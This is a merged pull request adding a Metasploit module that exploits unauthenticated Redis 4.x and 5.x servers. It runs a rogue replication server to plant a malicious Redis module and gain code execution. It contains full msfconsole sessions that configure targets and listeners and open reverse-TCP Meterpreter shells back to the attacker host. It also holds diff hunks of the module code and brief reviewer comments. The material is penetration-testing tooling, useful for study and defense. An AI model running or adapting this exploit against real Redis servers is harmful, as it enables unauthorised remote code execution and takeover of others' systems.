### PR TITLE
Add module Redis Unauthenticated Code Execution

### PR DESCRIPTION
**Pull request by Green-m**
## Description

This module exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x

## Vulnerable Application

**Vulnerable Application Link**

- Official Docker Images

https://hub.docker.com/_/redis/

## Vulnerable Application Installation Setup.

```
docker pull redis
docker run -p 6379:6379 -d --name redis_slave redis
```

## Options   

- CUSTOM

IF `CUSTOM` set to true, this exploit would generate a source code file, and compile it to a redis module file during running, which is more undetectable. 
It's only worked on linux system.

For other scenarios, such as lack of gcc, or others opreate systems, framework could not compile the source for sucessful exploit, it uses the pre-compiled redis module to accomplish this exploit.

### set CUSTOM true (available only on linux)

```
msf5 exploit(multi/redis/redis_unanth_rce) > options

Module options (exploit/multi/redis/redis_unanth_rce):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    127.0.0.1        yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   172.17.0.1       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6666             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/redis/redis_unanth_rce) > set verbose false
verbose => false
msf5 exploit(multi/redis/redis_unanth_rce) > exploit

[*] Started reverse TCP handler on 172.17.0.1:8080 
[*] 127.0.0.1:6379        - Compile redis module extension file
[+] 127.0.0.1:6379        - Payload  generate successful! 
[*] 127.0.0.1:6379        - Listening on 172.17.0.1:6666
[*] 127.0.0.1:6379        - Rogue server close...
[*] 127.0.0.1:6379        - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:8080 -> 172.17.0.2:49556) at 2019-07-19 11:58:52 -0400
[!] 127.0.0.1:6379        - This exploit may require manual cleanup of './vxwqrg.so' on the target

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter > 

```

### Set CUSTOM false (available on all system)

```
msf5 > use exploit/linux/redis/redis_unauth_exec
msf5 exploit(linux/redis/redis_unauth_exec) > options

Module options (exploit/linux/redis/redis_unauth_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    false            yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6379             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/redis/redis_unauth_exec) > set rhosts 172.16.6.226
rhosts => 172.16.6.226
msf5 exploit(linux/redis/redis_unauth_exec) > set srvhost 172.16.6.1
srvhost => 172.16.6.1
msf5 exploit(linux/redis/redis_unauth_exec) > set srvport 6666
srvport => 6666
msf5 exploit(linux/redis/redis_unauth_exec) > set lhost 172.16.6.1
lhost => 172.16.6.1
msf5 exploit(linux/redis/redis_unauth_exec) > set lport 9999
lport => 9999
msf5 exploit(linux/redis/redis_unauth_exec) > options

Module options (exploit/linux/redis/redis_unauth_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    172.16.6.226     yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   172.16.6.1       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6666             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.6.1       yes       The listen address (an interface may be specified)
   LPORT  9999             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/redis/redis_unauth_exec) > exploit

[*] Started reverse TCP handler on 172.16.6.1:9999
[*] 172.16.6.226:6379     - Listening on 172.16.6.1:6666
[*] 172.16.6.226:6379     - Rogue server close...
[*] 172.16.6.226:6379     - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 172.16.6.226
[*] Meterpreter session 3 opened (172.16.6.1:9999 -> 172.16.6.226:50362) at 2019-07-19 23:53:13 +0800
[*] 172.16.6.226:6379     - Command Stager progress - 100.00% done (819/819 bytes)
[!] 172.16.6.226:6379     - This exploit may require manual cleanup of './wfuujx.so' on the target

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter > getpid
Current pid: 173
```

### CODE REVIEW

File: modules/exploits/linux/redis/redis_unauth_exec.rb [hunk 1]
```diff
@@ -0,0 +1,271 @@
...
+
+    # Trigger it.
+    print_status('Sending command to trigger payload.')
+    pull_the_trigger
+
+    # Clean up
+    Rex.sleep(2)
+    register_file_for_cleanup("./#{module_file}")
+    #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
+    #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
```
Comment (Green-m) [inline modules/exploits/linux/redis/redis_unauth_exec.rb]: Please take note this cleanup, I commented the last two Redis commands, for it's always failed.
The reason is once a new session started, the Redis would get blocked and give no response to any request, which leads the command for cleanup to always failed.

To clean it successfully, we have to wait for the session ends. Actually, I did not know how to do it. :-(

File: modules/exploits/linux/redis/redis_unauth_exec.rb [hunk 2]
```diff
@@ -0,0 +1,271 @@
...
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Redis
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Redis Unauthenticated Code Execution',
+      'Description'    => %q{
+        This module can be used to leverage the extension functionality added by Redis 4.x and 5.x
+        to execute arbitrary code, to transmit the evil extension it makes use of the feature of Redis
```
Comment (wvu-r7) [inline modules/exploits/linux/redis/redis_unauth_exec.rb]: > evil extension

It's not really evil. :)

Also, `code, to` should be `code. To`.

File: modules/exploits/linux/redis/redis_unauth_exec.rb [hunk 3]
```diff
@@ -0,0 +1,271 @@
...
+      [
+        Opt::RPORT(6379),
+        OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']),
+        OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger evil function. Random string as default.']),
```
Comment (wvu-r7) [inline modules/exploits/linux/redis/redis_unauth_exec.rb]: Not evil.

File: modules/exploits/linux/redis/redis_unauth_exec.rb (hunk 2 above)
Comment (Green-m) [reply modules/exploits/linux/redis/redis_unauth_exec.rb]: My poor english :)

**Comment by ccondon-r7** [comment]
Hey, @Green-m! Haven't seen you in the Framework PR queue in a while, welcome back :)

**Comment by Green-m** [comment]
@ccondon-r7 Nice to see you again!

**Comment by wchen-r7** [comment]
I'm currently working on this pull request. Thanks for the patience!

**Comment by wchen-r7** [comment]
Another excellent module from @Green-m. Thanks for waiting.

**Comment by wchen-r7** [comment]
# Release Notes

This module exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x

**Pull request merged**